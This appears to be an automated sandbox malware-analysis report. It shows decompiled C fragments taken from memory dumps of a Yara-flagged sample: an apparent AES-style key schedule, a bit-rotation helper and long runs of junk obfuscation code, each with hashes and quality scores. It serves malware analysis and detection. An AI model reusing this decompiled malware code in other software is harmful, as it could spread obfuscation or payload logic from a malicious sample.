                                  • Instruction Fuzzy Hash: EC513777E806619BC71CCB2ED88412DB7E2FF8431571E85A5D869D7345D730AC82CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E72482D87(intOrPtr* __eax, signed int __edx, char _a1, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
                                  				signed int _v117;
                                  				signed int _t69;
                                  				signed int* _t74;
                                  				signed int* _t87;
                                  				signed int _t100;
                                  				signed int _t102;
                                  				signed int _t112;
                                  				signed int _t114;
                                  				signed int* _t117;
                                  				signed int _t134;
                                  				signed int _t136;
                                  				signed int _t140;
                                  				signed int _t161;
                                  				intOrPtr _t183;
                                  
                                  				 *__eax =  *__eax - __eax;
                                  				asm("cmpsd");
                                  				_pop(ds);
                                  				asm("lahf");
                                  				asm("ror esi, cl");
                                  				_v117 = _v117 | __edx;
                                  				_push( &_a1);
                                  				_t87 = _a16;
                                  				_t117 = _a12;
                                  				asm("ror esi, 0x8");
                                  				asm("rol eax, 0x8");
                                  				 *_t117 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
                                  				_t69 =  &(_t117[1]);
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t117[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
                                  				asm("ror esi, 0x8");
                                  				asm("rol ecx, 0x8");
                                  				_t117[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
                                  				if(_a20 != 0x100) {
                                  					L5:
                                  					return _t69 | 0xffffffff;
                                  				} else {
                                  					_t183 = _a4;
                                  					_t74 = 0;
                                  					_a12 = 0;
                                  					while(1) {
                                  						_t161 =  *(_t69 + 0x18);
                                  						_t100 = ( *(_t183 + 4 + (_t161 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t183 +  &(_t74[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t183 + 4 + (_t161 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t183 + 5 + (_t161 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t183 + 4 + (_t161 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t69 - 4);
                                  						_t134 =  *_t69 ^ _t100;
                                  						 *(_t69 + 0x1c) = _t100;
                                  						_t102 =  *(_t69 + 4) ^ _t134;
                                  						 *(_t69 + 0x20) = _t134;
                                  						_t136 =  *(_t69 + 8) ^ _t102;
                                  						 *(_t69 + 0x24) = _t102;
                                  						 *(_t69 + 0x28) = _t136;
                                  						if(_t74 == 6) {
                                  							break;
                                  						}
                                  						_t112 = ( *(_t183 + 4 + (_t136 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t183 + 4 + (_t136 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t183 + 4 + (_t136 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t183 + 5 + (_t136 & 0x000000ff) * 4) & 0x000000ff ^  *(_t69 + 0xc);
                                  						_t140 =  *(_t69 + 0x10) ^ _t112;
                                  						 *(_t69 + 0x2c) = _t112;
                                  						_t114 =  *(_t69 + 0x14) ^ _t140;
                                  						 *(_t69 + 0x34) = _t114;
                                  						_t74 =  &(_a12[0]);
                                  						 *(_t69 + 0x30) = _t140;
                                  						 *(_t69 + 0x38) = _t114 ^ _t161;
                                  						_t69 = _t69 + 0x20;
                                  						_a12 = _t74;
                                  						if(_t74 < 7) {
                                  							continue;
                                  						} else {
                                  							goto L5;
                                  						}
                                  						goto L7;
                                  					}
                                  					return 0xe;
                                  				}
                                  				L7:
                                  			}


















                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cacb2759c371f9fc250d3b6cde2a9c42958ee41507e234b29bb7a9e55c6524b5
                                  • Instruction ID: d6e10df79dbc04a87bc48f59500bbf4d0b1d9a224cf645a822b5acbd3dc3873c
                                  • Opcode Fuzzy Hash: cacb2759c371f9fc250d3b6cde2a9c42958ee41507e234b29bb7a9e55c6524b5
                                  • Instruction Fuzzy Hash: 1151A1B3E14A214BD318CF19CC40631B792FFD8312B5F81BEDD1A9B357CA74A9529A90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E72482D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                  				signed int _t66;
                                  				signed int* _t69;
                                  				signed int* _t81;
                                  				signed int _t94;
                                  				signed int _t96;
                                  				signed int _t106;
                                  				signed int _t108;
                                  				signed int* _t110;
                                  				signed int _t127;
                                  				signed int _t129;
                                  				signed int _t133;
                                  				signed int _t152;
                                  				intOrPtr _t171;
                                  
                                  				_t81 = _a12;
                                  				_t110 = _a8;
                                  				asm("ror esi, 0x8");
                                  				asm("rol eax, 0x8");
                                  				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                  				_t66 =  &(_t110[1]);
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                  				asm("ror edi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                  				asm("ror esi, 0x8");
                                  				asm("rol ecx, 0x8");
                                  				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                  				if(_a16 != 0x100) {
                                  					L4:
                                  					return _t66 | 0xffffffff;
                                  				} else {
                                  					_t171 = _a4;
                                  					_t69 = 0;
                                  					_a12 = 0;
                                  					while(1) {
                                  						_t152 =  *(_t66 + 0x18);
                                  						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                  						_t127 =  *_t66 ^ _t94;
                                  						 *(_t66 + 0x1c) = _t94;
                                  						_t96 =  *(_t66 + 4) ^ _t127;
                                  						 *(_t66 + 0x20) = _t127;
                                  						_t129 =  *(_t66 + 8) ^ _t96;
                                  						 *(_t66 + 0x24) = _t96;
                                  						 *(_t66 + 0x28) = _t129;
                                  						if(_t69 == 6) {
                                  							break;
                                  						}
                                  						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                  						_t133 =  *(_t66 + 0x10) ^ _t106;
                                  						 *(_t66 + 0x2c) = _t106;
                                  						_t108 =  *(_t66 + 0x14) ^ _t133;
                                  						 *(_t66 + 0x34) = _t108;
                                  						_t69 =  &(_a12[0]);
                                  						 *(_t66 + 0x30) = _t133;
                                  						 *(_t66 + 0x38) = _t108 ^ _t152;
                                  						_t66 = _t66 + 0x20;
                                  						_a12 = _t69;
                                  						if(_t69 < 7) {
                                  							continue;
                                  						} else {
                                  							goto L4;
                                  						}
                                  						goto L6;
                                  					}
                                  					return 0xe;
                                  				}
                                  				L6:
                                  			}

















                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                  • Instruction ID: 2cd00995dedf237ac552ce95a692320601d9eaf14ae9e94b549b68800733fe02
                                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                  • Instruction Fuzzy Hash: E15160B3E14A214BD318CE09CC40635B792FFD8312B5B81BEDD1A9B357CE74E9529A90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 621d09871b3c6f18d6d89be277ea6c17279b36dc3c5e2c7dc20980ffc35a834f
                                  • Instruction ID: 0b945c3692904ff2aafb68f30fc79785aefb95d2412cf6841b7947c7003a41d8
                                  • Opcode Fuzzy Hash: 621d09871b3c6f18d6d89be277ea6c17279b36dc3c5e2c7dc20980ffc35a834f
                                  • Instruction Fuzzy Hash: A051DC74500206EBCB24DF28C881ABE7BF9FF49314F1048AEE882C7291E770D851CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E7249C4E6() {
                                  				signed int _t12;
                                  				void* _t17;
                                  				signed char _t18;
                                  				signed int _t19;
                                  				void* _t22;
                                  				signed int _t24;
                                  				signed int _t27;
                                  				signed int _t29;
                                  				intOrPtr _t31;
                                  
                                  				asm("adc eax, 0xdc439e3c");
                                  				if(_t22 + 1 <= 0) {
                                  					__edx =  *0x961e0b7f * 0xa4eb;
                                  					__ecx = __ecx | 0x8f540fcf;
                                  					__esi = __esi -  *0x1c7fc519;
                                  					__edi = __edi + 1;
                                  					__esi = __esi +  *0x960d6f1b;
                                  					 *0x2c51c089 =  *0x2c51c089 | __edi;
                                  					_t6 = __esi;
                                  					__esi =  *0xe83e07db;
                                  					 *0xe83e07db = _t6;
                                  					asm("rcr dword [0xb31dd43f], 0x92");
                                  					_pop( *0x585dfe83);
                                  					if(__dl < 0x38) {
                                  						 *0x2b0e6d79 =  *0x2b0e6d79 << 0xa1;
                                  						 *0xbe1d0711 =  *0xbe1d0711 - __ebp;
                                  						__esp = __esp ^  *0x152a676d;
                                  						__ecx = __ecx |  *0xe9012261;
                                  						 *0xaed0e80a =  *0xaed0e80a & __bh;
                                  						asm("rcr dword [0xd360a1c8], 0x3d");
                                  						__bh = __bh ^ 0x0000008a;
                                  						__eax = __eax - 0x6c13b307;
                                  						_push(__edi);
                                  						__esi = __esi +  *0x6e0c5cb8;
                                  						 *0xd0301f23 =  *0xd0301f23 & __ebp;
                                  						 *0x385a200d =  *0x385a200d >> 0x50;
                                  						__ecx = __ecx - 1;
                                  						__ebx = __ebx | 0x3129466e;
                                  						asm("rcr byte [0x27e6da0c], 0x3b");
                                  						 *0x6bd670dd =  *0x6bd670dd - __edx;
                                  						__edi = __edi - 1;
                                  						__ebp = __ebp +  *0xbf51fb9;
                                  						if(__ebp == 0) {
                                  							__eax = __eax |  *0x5c9e107b;
                                  							asm("adc esp, 0xbf0252cd");
                                  							 *0x53b5cec0 =  *0x53b5cec0 - __ebp;
                                  							__ebp = __ebp +  *0x1e02579a;
                                  							_pop(__ebx);
                                  							 *0x1b53129c =  *0x1b53129c - __edx;
                                  							asm("adc [0x3ebf1b92], edi");
                                  							 *0xd93a10f8 =  *0xd93a10f8 - __edi;
                                  							 *0xb915d61e =  *0xb915d61e & __edi;
                                  							__edi = __edi | 0x7b0bf51f;
                                  							 *0x51c451d =  *0x51c451d & __ecx;
                                  							__dl =  *0x17dab00a;
                                  							 *0x3818e582 =  *0x3818e582 & __ah;
                                  							__edi = __edi + 0x60648f2e;
                                  							__edx = __edx ^  *0xc87e1d1f;
                                  							__edi = __edi | 0xbb3d5ea1;
                                  							 *0x12f2b7bd =  *0x12f2b7bd >> 0x87;
                                  							asm("sbb [0x1210e03], esi");
                                  							asm("sbb [0xe296f467], edi");
                                  							asm("movsw");
                                  							__edx = __ebx;
                                  							asm("rol dword [0x2a8205ee], 0x87");
                                  							if(( *0xa11ce904 & __bh) <= 0) {
                                  								__esp =  *0x1f71cf7f * 0xd8d6;
                                  								 *0x3516dcf2 =  *0x3516dcf2 >> 0x86;
                                  								 *0xbb4b6719 =  *0xbb4b6719 + __esp;
                                  								__edi = __edi -  *0x980fbc6f;
                                  								 *0x79585dfe = __edx;
                                  								__ebp = __ebp + 0xa9dc156d;
                                  								__ebp = __ebp ^  *0x36399315;
                                  								asm("lodsb");
                                  								__ebx = __ebx ^  *0xdcf8d662;
                                  								if(__ebx == 0) {
                                  									asm("adc bl, 0x14");
                                  									__ebp = __ebp &  *0x1b85386c;
                                  									asm("ror byte [0xb310c02], 0x86");
                                  									__eax = __eax ^  *0x699f07f8;
                                  									__esp =  *0x8e6cc169 * 0xbd85;
                                  									asm("adc [0x4cd71112], dl");
                                  									asm("sbb cl, [0x434793e5]");
                                  									_push(__edx);
                                  									__ebx = __ebx |  *0xde71df3f;
                                  									__dl = __dl ^ 0x00000014;
                                  									__eax =  *0xf7c1f26a * 0x107b;
                                  									__edi = __edi + 1;
                                  									__edi = __edi -  *0xc3130d0d;
                                  									 *0x76128000 =  *0x76128000 & __ah;
                                  									asm("adc bl, 0xa2");
                                  									asm("stosb");
                                  									_push(__edi);
                                  									asm("adc [0x9c5b1e02], al");
                                  									__edi = __edi - 0xdcff820d;
                                  									__esi = __esi &  *0x82c33a0f;
                                  									if(__ecx != 0) {
                                  										__ebp = __ebp ^  *0x1a646374;
                                  										_t11 = __esp;
                                  										__esp =  *0x42a8205;
                                  										 *0x42a8205 = _t11;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				asm("sbb esp, [0x91ed4609]");
                                  				 *0x4f9ebbde =  *0x4f9ebbde | _t29;
                                  				 *0x4f0dc00c =  *0x4f0dc00c & _t19;
                                  				_t27 = _t27 &  *0xfdf527f5;
                                  				asm("adc dh, [0xe865f682]");
                                  				_t18 = _t18 | 0x000000e0;
                                  				_pop(_t24);
                                  				asm("sbb edi, [0x6341631f]");
                                  				_push(_t17);
                                  				asm("rol dword [0x44580c66], 0xaf");
                                  				asm("adc ebp, [0x5c9b3ff]");
                                  				if(((_t24 |  *0x180c5fba) & 0x3c693793) < 0) {
                                  					_t18 = _t18 | 0x44830d71;
                                  					asm("cmpsw");
                                  					_t17 = _t17 + 1;
                                  					 *0xeb8796f7 =  *0xeb8796f7 - _t31;
                                  					_push(_t18);
                                  					if( *0xeb8796f7 < 0) {
                                  						asm("sbb ecx, [0x5f8c8e71]");
                                  						asm("rcr dword [0xf191e413], 0x15");
                                  						asm("adc esi, [0xa2c14a91]");
                                  						asm("sbb esi, [0x959e7f2f]");
                                  						asm("sbb edi, [0x6971c66e]");
                                  						_t18 = _t18 ^  *0x21d9a8f9;
                                  						_t17 = _t17 - 0xd7;
                                  						_t27 = _t27 +  *0x7bb225ba &  *0x84dbc09;
                                  						_pop(_t12);
                                  						 *0x6b5a6b28 =  *0x6b5a6b28 & _t18;
                                  						asm("sbb ecx, [0x247f05c0]");
                                  						_t29 = _t29 -  *0x3be23cb8 + 1;
                                  						_t19 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
                                  						_push( *0x194e49da);
                                  						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
                                  						_t3 = _t31;
                                  						_t31 =  *0x46ef4e9e;
                                  						 *0x46ef4e9e = _t3;
                                  						 *0xb3184a0a =  *0xb3184a0a ^ _t18;
                                  						 *0x63d6250f =  *0x63d6250f ^ _t12;
                                  					}
                                  				}
                                  				goto L1;
                                  			}













                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b64ee4b23312852b25963871ee74ec7356c84e3383aa27d700dba619d23213d
                                  • Instruction ID: 1b398c2523a38f38cfadfb8526a765a024f6fde2607767c8293818b622cd87c6
                                  • Opcode Fuzzy Hash: 0b64ee4b23312852b25963871ee74ec7356c84e3383aa27d700dba619d23213d
                                  • Instruction Fuzzy Hash: 15716832919395CFD706CF78DC9AA813FB2F799324749424EC8A1675C2D7742115CF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E7249C130(void* __ebx, signed char __ecx, void* __edx, void* __edi, signed int __esi) {
                                  				signed int _t23;
                                  				void* _t28;
                                  				signed char _t29;
                                  				signed int _t31;
                                  				signed int _t35;
                                  				signed int _t38;
                                  				signed int _t40;
                                  				void* _t42;
                                  				intOrPtr _t43;
                                  
                                  				_t38 = __esi;
                                  				_t29 = __ecx;
                                  				_t28 = __ebx;
                                  				asm("sbb ecx, [0xc90f11e9]");
                                  				 *0x488dd33c =  *0x488dd33c << 0x8d;
                                  				_t31 = __edx + 1;
                                  				 *0x9dabb6a9 =  *0x9dabb6a9 << 0x3c;
                                  				_push(__ecx);
                                  				_t43 = _t42 +  *0xa319fb19;
                                  				if(_t43 >= 0) {
                                  					asm("sbb ecx, [0x7088dd83]");
                                  					asm("movsb");
                                  					__ecx = __ecx +  *0xb7a4cef7;
                                  					_pop(__ebx);
                                  					__edi = __edi - 0xc9c4dfa1;
                                  					asm("sbb edi, [0xdf16171e]");
                                  					_pop( *0xdec029de);
                                  					__dh = __dh ^ 0x000000d7;
                                  					asm("sbb [0xd01cd431], ebp");
                                  					asm("adc [0x8f0e03f7], ebp");
                                  					__dl = __dl | 0x000000e3;
                                  					__edx = __edx + 1;
                                  					__ebx = __ebx - 1;
                                  					asm("adc [0x63b6b0f3], edx");
                                  					asm("movsw");
                                  					asm("sbb [0x472615d7], cl");
                                  					 *0x1e84702 =  *0x1e84702 << 0x68;
                                  					 *0xfd08110c =  *0xfd08110c >> 0xb;
                                  					__esp = __esp | 0x64c8a78b;
                                  					asm("sbb eax, 0xac9a661");
                                  					asm("sbb edi, 0xc39fcbf7");
                                  					asm("sbb dh, [0x9a0492b1]");
                                  					 *0x7e1db308 =  *0x7e1db308 + __cl;
                                  					_push(__ebp);
                                  					asm("lodsb");
                                  					__ecx = __ecx - 1;
                                  					asm("sbb ebp, 0x91e7b1f3");
                                  					asm("sbb edx, [0x4e4308cd]");
                                  					_t8 = __cl;
                                  					__cl =  *0xbeedfca0;
                                  					 *0xbeedfca0 = _t8;
                                  					__ch = __ch ^ 0x000000e7;
                                  					 *0xcb69d78d =  *0xcb69d78d >> 0xa2;
                                  					_push(__esi);
                                  					__ch = __ch & 0x000000e0;
                                  					_push( *0x2212030e);
                                  					__edx = __edx & 0x8af1def4;
                                  					 *0x4a6472ce =  *0x4a6472ce >> 0xa9;
                                  					asm("adc dl, [0x55a3a680]");
                                  					asm("cmpsw");
                                  					_push(__ebx);
                                  					asm("rcr byte [0xa7b130c], 0x42");
                                  					__cl =  *0x403b078a;
                                  					 *0x403b078a =  *0xbeedfca0;
                                  					_t14 = __ebp;
                                  					__ebp =  *0xd812b313;
                                  					 *0xd812b313 = _t14;
                                  					__dl = __dl |  *0x77b512b3;
                                  					__esi = __esi + 1;
                                  					if(__esi < 0) {
                                  						__ebx =  *0x69051c7d * 0xa8a2;
                                  						_t15 = __ecx;
                                  						__ecx =  *0xf51fb90f;
                                  						 *0xf51fb90f = _t15;
                                  						 *0xc0157b0b =  *0xc0157b0b << 0xed;
                                  						__edi =  *0x1a9705a9;
                                  						asm("adc [0xb8885087], ecx");
                                  						__ecx =  *0xf51fb90f &  *0x6c104dcf;
                                  						asm("adc [0x21b8538], cl");
                                  						 *0xf8fc70d =  *0xf8fc70d << 0x92;
                                  						 *0x579c54b0 =  *0x579c54b0 >> 0xbb;
                                  						asm("ror byte [0x94728680], 0x58");
                                  						asm("sbb ecx, [0x5c135f8e]");
                                  						_push( *0xe4441a27);
                                  						_push( *0xa87ed9a1);
                                  						__ecx =  *0x9149b26a * 0x1a4a;
                                  						asm("adc ebp, [0x393d670e]");
                                  						 *0xae60ea38 =  *0xae60ea38 | __cl;
                                  						 *0x8205a7fd =  *0x8205a7fd |  *0x9149b26a * 0x00001a4a;
                                  						asm("sbb ch, 0x2a");
                                  						__ah = __ah -  *0x480ce904;
                                  						_push(__esp);
                                  						asm("sbb ebp, 0x62de491d");
                                  						if(( *0xe2da8821 & __esi) > 0) {
                                  							goto L1;
                                  						} else {
                                  							__ecx =  *0x660fbd7f * 0xaf3c;
                                  							__esp = __esp - 1;
                                  							asm("sbb edi, [0x62245aeb]");
                                  							 *0x76ef4f9f =  *0x76ef4f9f ^ __edi;
                                  							_push( *0x104e20ba);
                                  							_t22 = __eax;
                                  							__eax =  *0xa10cb0ce;
                                  							 *0xa10cb0ce = _t22;
                                  							 *0xae899f3b =  *0xae899f3b << 0x33;
                                  							_push( *0x5794b38f);
                                  							asm("sbb bh, 0x2");
                                  							return  *0xa10cb0ce;
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				asm("sbb esp, [0x91ed4609]");
                                  				 *0x4f9ebbde =  *0x4f9ebbde | _t40;
                                  				 *0x4f0dc00c =  *0x4f0dc00c & _t31;
                                  				_t38 = _t38 &  *0xfdf527f5;
                                  				asm("adc dh, [0xe865f682]");
                                  				_t29 = _t29 | 0x000000e0;
                                  				_pop(_t35);
                                  				asm("sbb edi, [0x6341631f]");
                                  				_push(_t28);
                                  				asm("rol dword [0x44580c66], 0xaf");
                                  				asm("adc ebp, [0x5c9b3ff]");
                                  				if(((_t35 |  *0x180c5fba) & 0x3c693793) < 0) {
                                  					_t29 = _t29 | 0x44830d71;
                                  					asm("cmpsw");
                                  					_t28 = _t28 + 1;
                                  					 *0xeb8796f7 =  *0xeb8796f7 - _t43;
                                  					_push(_t29);
                                  					if( *0xeb8796f7 < 0) {
                                  						asm("sbb ecx, [0x5f8c8e71]");
                                  						asm("rcr dword [0xf191e413], 0x15");
                                  						asm("adc esi, [0xa2c14a91]");
                                  						asm("sbb esi, [0x959e7f2f]");
                                  						asm("sbb edi, [0x6971c66e]");
                                  						_t29 = _t29 ^  *0x21d9a8f9;
                                  						_t28 = _t28 - 0xd7;
                                  						_t38 = _t38 +  *0x7bb225ba &  *0x84dbc09;
                                  						_pop(_t23);
                                  						 *0x6b5a6b28 =  *0x6b5a6b28 & _t29;
                                  						asm("sbb ecx, [0x247f05c0]");
                                  						_t40 = _t40 -  *0x3be23cb8 + 1;
                                  						_t31 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
                                  						_push( *0x194e49da);
                                  						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
                                  						_t3 = _t43;
                                  						_t43 =  *0x46ef4e9e;
                                  						 *0x46ef4e9e = _t3;
                                  						 *0xb3184a0a =  *0xb3184a0a ^ _t29;
                                  						 *0x63d6250f =  *0x63d6250f ^ _t23;
                                  					}
                                  				}
                                  				goto L1;
                                  			}













                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4038ca7b8b95083aaefe28803c4f7b6095821a965a3d673a155e5a7340f24422
                                  • Instruction ID: dad22150491ee864dfec4d6ba82e4413f5d1a21ce4260d924e3dc5d6cc8ecb69
                                  • Opcode Fuzzy Hash: 4038ca7b8b95083aaefe28803c4f7b6095821a965a3d673a155e5a7340f24422
                                  • Instruction Fuzzy Hash: C1612F32609795CFDB1ACF38D896B413FB6F386724709438ED9A2535D2D7312119CB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E72481030(signed char* __eax) {
                                  				signed char* _t37;
                                  				unsigned int _t65;
                                  				unsigned int _t73;
                                  				unsigned int _t81;
                                  				unsigned int _t88;
                                  				signed char _t94;
                                  				signed char _t97;
                                  				signed char _t100;
                                  
                                  				_t37 = __eax;
                                  				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                  				_t94 = __eax[0xb];
                                  				if((_t94 & 0x00000001) != 0) {
                                  					_t65 = _t65 | 0x80000000;
                                  				}
                                  				_t37[0xc] = _t65 >> 0x18;
                                  				_t37[0xf] = _t65;
                                  				_t37[0xd] = _t65 >> 0x10;
                                  				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                  				_t97 = _t37[7];
                                  				_t37[0xe] = _t65 >> 8;
                                  				if((_t97 & 0x00000001) != 0) {
                                  					_t73 = _t73 | 0x80000000;
                                  				}
                                  				_t37[8] = _t73 >> 0x18;
                                  				_t37[0xb] = _t73;
                                  				_t37[9] = _t73 >> 0x10;
                                  				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                  				_t100 = _t37[3];
                                  				_t37[0xa] = _t73 >> 8;
                                  				if((_t100 & 0x00000001) != 0) {
                                  					_t81 = _t81 | 0x80000000;
                                  				}
                                  				_t37[4] = _t81 >> 0x18;
                                  				_t37[7] = _t81;
                                  				_t37[5] = _t81 >> 0x10;
                                  				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                  				 *_t37 = _t88 >> 0x18;
                                  				_t37[1] = _t88 >> 0x10;
                                  				_t37[6] = _t81 >> 8;
                                  				_t37[2] = _t88 >> 8;
                                  				_t37[3] = _t88;
                                  				return _t37;
                                  			}












                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                  • Instruction ID: 47b383f01452d80e186b618947760d21cf283e1c6a3d50761ab7b9c191177758
                                  • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                  • Instruction Fuzzy Hash: DE3180116597F10ED30E836D48B9A75AED18E9720174EC2FEDADB6F2F3C0888408D3A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E72486ABE() {
                                  
                                  				asm("adc ebp, [ebp+ecx*8+0x6b3aa8a4]");
                                  				return 1;
                                  			}




                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
                                  • Instruction ID: 2a283f07abafddba1a69a7c886669618796b812e570c7ba05b4463204ccdd17a
